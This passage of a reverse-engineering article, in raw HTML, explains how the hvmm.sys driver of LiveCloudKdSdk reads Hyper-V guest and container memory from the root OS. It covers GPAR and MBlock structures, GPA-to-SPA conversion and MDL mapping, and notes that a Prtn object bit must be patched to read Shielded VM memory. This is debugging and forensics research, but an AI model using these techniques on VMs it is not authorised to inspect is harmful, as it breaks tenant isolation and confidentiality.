"consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pBuffer</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">len</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: 
none; vertical-align: baseline;">GPA</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPA – it is page number, which is calculated: GPA = GpaInfo.StartAddress / PAGE_SIZE;</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The start address should be aligned on the page boundary, if the hvmm driver function is called directly (LiveCloudKdSdk prepared usermode buffer for that).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we need to find GPAR object, that describes the requested GPA. Each GPA is included in the memory block, previously allocated by the hypervisor, and this memory block is described by the GPAR object. Fields GpaIndexStart and GpaIndexEnd are located, respectively, at the offsets 0x100 and 0x108 of the GPAR objects. You can understand whether the GPAR object describes the GPA or not, by the value of these fields. For example:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 181px; overflow: hidden; width: 352px;"><img height="181" src="https://lh5.googleusercontent.com/yKf4u3ShsKEMhmV1QudmwQEQFd6R7TaaPTB2Jjlp3eVWyDIC7HQ6SSHowasA8ELKtak31vcKOFqFbwwixI810Cj-K_S2sieLRknSmk5JWkRvEQgTt-UeXVBfsc4V9WmTj6om7DQ" style="margin-left: 0px; margin-top: 0px;" width="352" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This GPAR object control GPA from 0 to 0x8fbff.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPAR objects count in Full VM are much smaller than in containers. For example, Generation 2 Full VM has 3-4 GPAR objects, containers have about 780. Then guest OS has more memory, then more blocks it allocates with HvMapGpaPages* hypercalls and, correspondingly, there are greater numbers of GPAR objects. The maximum range of GPAs, described by GPAR object, that I met, was 0x96000 pages.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's get back to our driver. We can find GPAR object using hvmm.sys!VidGetGparObjectForGpa function. Partition handle and GPA are passed to the function. How does it work? As described above, each partition handle has a pointer to a GPA block descriptor. This is a structure, which, among other things, contains a pointer to the partition handle itself, a pointer to array with pointers to GPAR objects, and the count of elements in the array of GPAR objects (see the diagram of the relationship of structures above).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 70px; overflow: hidden; width: 192px;"><img height="70" src="https://lh5.googleusercontent.com/qZHx9kWi38n8JPq6Sx-FmdG9xBlZCdw1ZGVYqx4TrRgq98k5AyAxpfOBHFnhTqBEyphUTl9dC7VLOKUul09V_9Cj1AvpwyMcIcxrNLHrRxujT9PKy810fyLtFND_gIRCsU7YKUk" style="margin-left: 0px; margin-top: 0px;" width="192" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 155px; overflow: hidden; width: 456px;"><img height="155" src="https://lh3.googleusercontent.com/EcoaQhZZs168nuflM_yzRSpwENC1I6ZmuFIIqLHdn6FrIL6BPvbouSo1LsCoC_R5FoJboAY1bwmOMaYfZMXgamfN-x5qbzgyPaQaJfzkD3i84aqHpmjNjxJ1WJAFBmjezKTfyro" style="margin-left: 0px; margin-top: 0px;" width="456" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 125px; overflow: hidden; width: 397px;"><img height="125" src="https://lh5.googleusercontent.com/7mJ8kiCy66aDDNR6c4cAwCBm4miaN7eZ0vszyVA_P4prDtyxJrcsujnyap1OJlFcmrRz0eBpBXqme48o5XFmuHjwRIdI-NTdAzunBFrFyG9lrztetxp1UwNHHqOrEkiOuUZL9Fk" style="margin-left: 0px; margin-top: 0px;" width="397" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we got this information, we can run cycle through the GPAR objects and find 1 GPAR the object, that is responsible for the GPA. Code is quite simple, as you can see. This is a simplified implementation of VsmmLookupMemoryBlockByHandle function of vid.sys driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vid.sys driver also has additional procedure for encrypted memory reading - VsmmpSecureReadMemoryBlockPageRangeInternal. It uses AES XTS through BCryptEncrypt\BCryptDecrypt functions from ksecdd.sys driver. I can’t find in what cases they are used, because even for Shielded VMs with TPM enabled, memory is not encrypted. Perhaps some special areas are encrypted, but they haven’t been found still. But if you try use vid.dll! VidRead\WriteMemoryBlockPageRange functions vid.sys starts analyze second bit in 0x18 byte of Prtn object (test byte ptr [Prtn_obj+18h], 2), and if that bit is not zero crypto-memory functions will be executed. But for standard OS regions they will return fails. It means, for reading Shielded VM memory using vid.dll functions, Prtn object must be patched (2nd bit in 18h byte must be zeroed). Obviously, guest OS directly make reading/writing operations to the already allocated memory area without calling any functions from vid.sys. All exceptions must be caught and handled by the hypervisor. Accordingly, if the root OS encrypts some parts of the memory, then the guest OS will not be able to transparently access them.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go back to the hvmm code. </span><span style="font-family: calibri, sans-serif; font-size: 9pt; text-indent: 35.4pt;">When we found a suitable GPAR object, we exit from cycle.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 270px; overflow: hidden; width: 329px;"><img height="270" src="https://lh4.googleusercontent.com/EOt-LDyTno_RitMhemmdWc1xQohzcZz5M5cq3WwVy_oGcdc19tt6ynaIB_dVwxpPQiBdXXBw5RiUrVmf6lbnfRgRPibQg10O27NbX84bSzBLaZUPHO7XwuuS-jC1fW0SLtDqgA0" style="margin-left: 0px; margin-top: 0px;" width="329" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are GPAR objects exist, that don’t describe the GPA, but instead of the necessary data, contain a pointer to a certain usermode structure inside the vmwp.exe process. They are tied to the memory allocated for virtual Hyper-V devices. Usually, there is 1 such GPAR object per partition (see content of that memory later in Docker part of that article).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 55px; overflow: hidden; width: 327px;"><img height="55" src="https://lh3.googleusercontent.com/4LvhHmL8SSgW8ks_6WPRZtYXAAobeaKrVpHZbKJdm01VjTeWPij07u_3x_vgtVJiaK6qmAHvqhoB5BbgAwfnpVTdPjYf0TjFQuVi-rnQjrxds0FUSx7-HVsT5WzxvX-xLhnHmFY" style="margin-left: 0px; margin-top: 0px;" width="327" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We don’t need in that objects during memory reading operations.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What data is contained in the GPAR object and will help to read the data from the guest OS? This is another data type - an MBlock object (MEMORY_BLOCK). It contains guest PFN data and other useful information. A fairly large structure, at the beginning contains the signature "Mb ".</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 107px; overflow: hidden; width: 228px;"><img height="107" src="https://lh3.googleusercontent.com/nTCpo3Z8ipHdoXmNm7fx2T-F2UYer11iv0XZrLiJj-g7Vim9hnOefYosgOOvn0zE1_qTa2la83mA8HNH9lzoBDotoK0kfiTVjp_8NSv0-ymxXipiWTSBoNi27LAdQI9KUI5V_u4" style="margin-left: 0px; margin-top: 0px;" width="228" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From all the fields, we need only a pointer to the GPA array. Size of the array element is 16 bytes. One 8-byte part contains the GPA (in guest OS), and other 8-byte part contains the SPA information (in root OS).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 89px; overflow: hidden; width: 246px;"><img height="89" src="https://lh5.googleusercontent.com/bAOpdK7V4R-93oEjqAqqm3LUGKp6NXpe0d5eEudjSz4vxVjjq2a0JEyDFrF8g-8N0DX9i8SfDrdxb5gRnd9BC1PyN-L0PAhcVYw7hZCoKFa3h7WQIBfrXf1yAKnYRIwc_LFDEVg" style="margin-left: 0px; margin-top: 0px;" width="246" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can calculate SPA by following formula:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 389px;"><img height="35" src="https://lh6.googleusercontent.com/9obLIpB_h5cngfxiMC9zJpC_rL-qjB6H2P2XVV5Ux_REeXYYxifh7SkhBFXj-25lpXY03n6iIZ0PtNXhLQKkhHuKWAPUJoueFAU3X3lPdGxViIsi29FQGLWVx8u1bPmeft14PG0" style="margin-left: 0px; margin-top: 0px;" width="389" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For SPA reading, we need mapped it to root OS virtual address space. Use MDL structure for this:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 24px; overflow: hidden; width: 329px;"><img height="24" src="https://lh5.googleusercontent.com/fJfmaM9z2WTFjlJPqHR1NM4uzTdXqa5t90LOg5lYLNcVO6-MDADqHXTjG3ou7SsGmjSnK5z4I1i0KorATsbcQsPMiAp9P_Mt8F734WnXrtvhyvfr5BNsu5PEIL9tkM5J7TkDLC4" style="margin-left: 0px; margin-top: 0px;" width="329" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is an array of PFN at the end of each MDL structure. A pointer to it can be obtained using MmGetMdlPfnArray macro. When we received the pointer, we had wrote HostSPA index to it. Of course, it is possible to put in MDL more than one PFN at one time. But there is a chance to get to the border of GPAR blocks, therefore memory reading is done page by page. For Full VM, this is not very profitable, since the size of each block is large enough, but speed is still good.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 199px; overflow: hidden; width: 409px;"><img height="199" src="https://lh4.googleusercontent.com/1hUAVBCFV4amLBuiM28NsmEaeUr1hRN6e1LDWRsdpkHxx1XiKaLPHWvrDqrhNPx1ne68S5FD0ezGE1t4J64RWZDURZ9Bpwjwp9z7sZwBpWF1agQGRpI0hxwjU30kCRT3WgwJL3s" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we get virtual address using the nt!MmMapLockedPagesSpecifyCache function and use it to copy guest OS memory block using nt!RtlCopyMemory. Accordingly, reading is performed in a loop. 1 memory page is copied on 1 iteration. During copying, it is recommended to pause the virtual machine in order to avoid memory modification during reading. In LiveCloudKdSdk, the SdkControlVmState function is implemented for this. It suspends the execution of the virtual machine either by the usual powershell-cmdlets Suspend-VM\Resume-VM, or works with the special register of each virtual processor calling HvWriteVpRegister hypercall and set the HvRegisterExplicitSuspend register to 0 (resume) or 1 (suspend).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Container memory reading</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Consider reading the container’s memory on Windows Defender Application Guard example (to use it, it’s need install same name component in Windows 10. It has been present since the 1803 build). Access to memory of Windows Sandbox and docker container in Hyper-V isolation mode is same.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It made by next function of hvmm.sys driver:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BOOLEAN</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VidGetContainerMemoryBlock(</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVM_PROCESS_CONTEXT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pPartitionHandle</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PCHAR</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , 
sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pBuffer</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">len</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;">GPA</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before executing it, as for Full VM, we must get partition handle first. Then, we will additionally need vmmem process handle. This process is created, when containers work, and works in kernel mode only. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see it’s threads, when launched container on a 4-processor PC (there are no user mode threads):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 294px; overflow: hidden; width: 398px;"><img height="294" src="https://lh3.googleusercontent.com/HTmOlLkPKrkngfY3DbXObsqF31FeJ6KN_jc007gvEW-akpyXvFVBIFyufjczFFR-rbcpNXNdxRw6kUSwXMBFBMv6CINnDFMFwEZ_J9hEMvh458S5kAmeanrb1-kR8dYhA_IA6Jk" style="margin-left: 0px; margin-top: 0px;" width="398" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The vmmem process descriptor is present in the partition handle. We can find it, using ‘scrP’ signature (see the hvmm!VidFindVmmemHandle function for details).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We get a pointer to the GPAR object, as same way for reading memory in Full VM. Next we see differences - other fields of the GPAR structure are used to read blocks of memory. VmmMemGpaOffset - the main offset, which allows us convert GPA to SPA for a specific memory block. There is additional offset present (SomeGpaOffset), which can influence to final result, but during my experiments it was always 0.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 391px;"><img height="135" src="https://lh4.googleusercontent.com/hXlITwIKmVNPoI74hKdfcXgmHH_Ld7AtbwhXVBbUnRprgkrnfLrqH8jxmaR2kAmAw2B4xzUj_F4ZbCrMXbki31CtGnA2b_cwkwdSmMywsBqIskqcZx9WIXYDFGKjCKwFGHqMGpk" style="margin-left: 0px; margin-top: 0px;" width="391" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we calculate source address, using the following formula and copy data block directly from the address space of vmmem process:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 194px; overflow: hidden; width: 429px;"><img height="194" src="https://lh4.googleusercontent.com/ZdgbsEwhtqF6Vgj20bz-UjjahaXkl3V9QBaLAIZ3p0ufDoZB6iFx806K5bKK-hNRT3CdsLxMkBzP6OzEgXACzYoUJniW3udiIShsyiQoJfCNy4zp8c9mn7yFldwYmpC5Yhzhpzk" style="margin-left: 0px; margin-top: 0px;" width="429" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
